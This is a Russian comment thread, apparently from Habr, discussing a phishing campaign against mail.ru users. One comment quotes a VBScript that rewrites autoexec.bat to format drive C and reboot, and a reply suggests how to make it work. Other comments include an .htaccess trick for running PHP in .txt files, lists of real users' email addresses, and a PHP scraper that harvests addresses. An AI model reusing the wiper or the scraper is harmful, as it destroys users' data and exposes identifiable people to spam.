Pull to refresh

Comments 69

Сколько итераций планируете здесь сделать?)
Видимо пока у них стек не закончится.
бороться с этим — как приколачивать желе гвоздями к дереву
Скройте список адресов, пожалуйста. Или вы хотите пополнить ими спам-листы?
мейл.ру само это сделает:) Открыл чтобы эти пользователи могли сами найти заметку, почитать и подумать.
А смысл? тут нет уязвимостей мейл.ру(ну кроме открытого редиректа на otvet.mail.ru, но это мелочь), пользователи сами отдают свои пароли, им и надо быть внимательнее.
Отписал пользователям с линком на заметку, но не думаю, что это вылечит их от невнимательности.
У меня есть подозрение, что там должны быть заинтересованы в пресечении таких выкрутасов не меньше вашего.
Читали уже про их пресечения в ICQ, не надо нам таких :)
Вы совершенно правы, мы (Mail.Ru) очень заинтересованы в борьбе с фишингом. И не просто заинтерсованы, мы ежедневно (в сотрудничестве с хостерами) закрываем фишинговые сайты (иногда — пачками). Хотя коммент выше про «желе гвоздями к дереву» весьма точно описывает ситуацию в целом.

Но в любом случае — если замечаете фишинг или просто что-то подозрительное, пишите на abuse@corp.mail.ru, мы разберемся. Спасибо.
Обычный СИ. Всегда был и всегда будет.
Мне вчера пришло на gmail, причем не в спам и без пометок:
"Happy New Year to all Gmail Users.we will be upgrading our database for the coming year 2012.Kindly reply to this message by typing «TEAM» to receive the update link for your account."
Т.е. еще и запросите у нас сами фишинговую ссыль…
Письмо конечно сразу ушло в фишинг репорт и сейчас уже помечается красным.
Отличный метод социальной инженерии, описанный, в частности, у Митника: жертва может не доверять присланным ей данным, но скорее всего будет доверять данным, которые жертва запросила самостоятельно.
Фишинг как фишинг. Только текст письма оригинален. Не ново.
На автор молодец, даже файл нашел куда складываются логины
Автор то молодец, но «взломщики» такие школьники! Их скрипты _открыты_ и даже _проиндексированы_. Ну не смех?! :-)
По ходу дела, у кого нет антивируса не суйтесь на этот линк URL: newamn.h18.ru/log.txt там раздают вот этот троян (bv:KillAll-A [Trj]) бесплатно.
Парсер парсер script language ="VBScript"
sub Reboot 'Процедурка перезагрузки
Set Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe User.exe,ExitWindows" 'Вызов WinApi с помощью
RunDll
end sub
sub destruct
set fs=createobject("Scripting.FileSystemObject")'FileSystem
if fs.fileexists("c:\autoexec.bat") then 'Если у нас Autoexec существует
set ab=fs.getfile("c:\autoexec.bat") 'Возмём его
ab.attributes=0 'И поставим "нормальные" аттрибуты))
end if
set autoexec=fs.CreateTextFile("c:\autoexec.bat")'Пересоздадим Autoexec
'Далее запишем в него полезные комманды, их там явно не хватает!)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@echo Windows upgrading your system..."
autoexec.WriteLine "@echo Do not abort this process!"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.close 'Закроем Autoexec.bat
end sub
destruct 'Запишем в Autoexec комманду format
reboot
Рекомендую в дальнейшем на Хабрахабре использовать пару тегов <source></source> для обрамления ими исходного кода.
Я думал себя адекватней поведёт
Предпросмотр еще ни кто не отменял.
Это не вирус, это магическое заклинание скрипт-кидди, которое по их мнению убивает систему и передается из поколения в поколение. Оно не сработает ни в одной системе начиная с Windows NT. Причем в Windows 95/98 оно тоже не сработает, потому как
echo Y | format C: /q
они сделать не догадались.
У меня нет антивируса, но есть noscript, и вообще стоит линукс. Можно я сунусь?
Расскажите нам пожалуйста еще что-нибудь о себе.
Замечательно, меня заминусовали хабраюзеры, которые боятся заразиться текстовым файлом. Еще и нагадили в то, что нельзя называть, с вашей легкой подачи. Можете собой гордиться.
Вы знаете, не хотелось бы оправдываться, но я на самом деле не хотел как-то повлиять на вашу хабракарму или рейтинг. Это была просто шутка и думаю те кто это понял, не ставили вам минуса, а те кто не понял скорее всего поставили бы их и без моего комментария.
Занятная проблема… А существуют ли какие-то надёжные её решения? (Факт существования цифровых подписей — это ещё не решение, по-моему.)
Боюсь, мою маму это не остановит.
Мылору и без фишинга дырявое как дуршлаг. Лучше юзать яндекс или гугол.
А Вы лично этот «дуршлаг» видели? Или начитались умных дяденек? Конкретней, пожалуйста.
Да, я лично видел как увели пару ящиков с мылору без фишинга. То есть вообще без телодвижений на клиентской стороне. Правда это было несколько лет назад.
Не хочу защищать мылру, но… При мне коллега находил отличную XSS на яндексе. Так что чуть лучшая репутация перечисленных вами компаний — отнюдь не гарантия защиты. Лучше тогда вообще ничего не пользовать :)
В образовательных целях. Строка «Гугл дал исходники этого скрипта» — как это было сделано? Т.е. можно выкачивать чужие скрипты?
Ага, и еще в файле логов плохие вещи.
image
Так, что лучше быть аккуратным.
Вы текстовым файлом хотите заразиться? Касперский ругается только потому, что в файле есть прямые ссылки на трояны, а Опера и не собирается их скачивать.
Не так давно слышал от чувака «ну ты типа как через картинку-то заразишься»? А оказалось — оверфлоу, все дела…
А вот я про это и говорю, txt файл может быть совсем не .txt. Простой пример:
В .htaccess

AddHandler application/x-httpd-php .php .txt .jpg

В log.txt
<?php
echo <<<LOG
blabla
blabla
LOG;
//А дальше код связки

Так, что HeadFore Вы не правы, и не нужно минусовать…
В данном случае txt — это именно txt, я проверил.
бы в шапках письма я не нашел хост и скрипт, с которого велась рассылка

Стоило бы выложить скриншот хедеров для наглядности.
Хост, я так понимаю, был найден в Received?
А скрипт как нашли?
В заголовках письма был и полный путь до скрипта на сервере.
Правильный хостер настраивает почтовик так, чтобы поле со скриптом дописывалось во все письма, отправляемые через sendmail, это позволяет быстро вычислить спамера по одной жалобе.
А список емейлов вы опубликовали для того чтобы обрадовать их владельцев свеженькой лавиной спама? Хотя бы картинкой вставили.
Список емейлов опубликовал для того, чтобы «жертвы» нашли заметку по поиску и намотали на ус.

Я не думаю, что в 2011 году скрытие емейла является действенным способом уберечься от спама — современная почтовая система должна уметь справляться со спамом.

При этом адреса пользователей не являются секретом на сервисах mail.ru — взглянем например на «мир» первого попавшегося пользователя, которого я нашел в гугле

адрес его «мира» — my.mail.ru/mail/cjroqa/
соответственно почтовый ящик — cjroqa@mail.ru

У него в друзьях:
my.mail.ru/inbox/privet2003/ — privet2003@inbox.ru
my.mail.ru/bk/vrshu/ — vrshu@mail.ru
my.mail.ru/mail/sfm61/ — sfm61@mail.ru
my.mail.ru/mail/342625/ — 342625@mail.ru
my.mail.ru/mail/rubicon78/ — rubicon78@mail.ru
my.mail.ru/mail/susoenio/ — susoenio@mail.ru

Так в чем же соль скрытия почтового ящика в посте на хабре?

Если спамерам надо, они возьмут эту информацию открыто с сервисов mail.ru и «добрые самаритяне» типо меня им нафик не нужны.
А ещё больше мыл круче на сайте otvet.mail.ru
Берем первую попавшуюся тему — otvet.mail.ru/question/598824
Грепаем на <span id="online:

$html = file_get_contents("http://otvet.mail.ru/question/598824");
if(preg_match_all("/<span\s+id\=\"online\:(.*)\"/isU", $html, $matches))
{
	print_r($matches[1]);
}

получаем:

[0] => vena1408@bk.ru
[1] => alesenok@mail.ru
[2] => olga_buzova@list.ru
[3] => usr-7145801a1c45b4e2840fe358a665bb34@nobody.mail.ru
[4] => usr-2e21e36d35a7ff50f0e68fe1ee33aad5@nobody.mail.ru
[5] => usr-a8c1bb6f07938b0020a02cf346ebb9e6@nobody.mail.ru
[6] => notichka@mail.ru
[7] => m-3-a-i-a@mail.ru
[8] => usr-7460bfe1590febfa229dbbf05df7a03a@nobody.mail.ru
[9] => m-radio71-3@mail.ru
IP резолвится как 78-36-109-183.static.komi.dslavangard.ru
80 порт открыт наружу.
Так что похоже, что у него стачитеский IP, так что проблем выяснения личности не будет.
Если найдётся время, было бы хорошо отписать провайдеру.
Боже, какие в наше время скрипт кидди пошли, даже стыдно за них как-то.
Надо курощать. Чтобы неповадно было в дальнейшем. Интересный идеологический момент — сдавать дятла отделу К или наказывать своими силами?
newamn.h18.ru/log.txt
Отправелено сообщение &Привет Эля! я тут просто пробую своё детище как оно работает! посмотри внимание на мыло отправителя!
2
мой настоящий е-мали
oooo2009oooo@mail.ru

В каком месте это хакеры?
Быть может, эту статью правильнее назвать «Как получают доступ к чужим ящикам»?
В gmail на такой случай есть хорошая штука — подтверждение по sms.
Было бы не плохо если mail.ru сделали подобное, да и не только mail.ru.
>детали письма скрыты для того, чтобы злоумышленник не стал преследовать знакомого
Можно подумать, что злоумышленник — маньяк-убийца и у него в заложниках находятся близкие вашего знакомого. Не бойтесь открыто проучить эту школоту.
Мне недавно подобная фигня на яндекс приходила. Особенно порадовала куча адресов в поле копий. Отписал в саппорт (реальный).
А я думал, что фишингу уже сто лет исполнилось…
Sign up to leave a comment.

Articles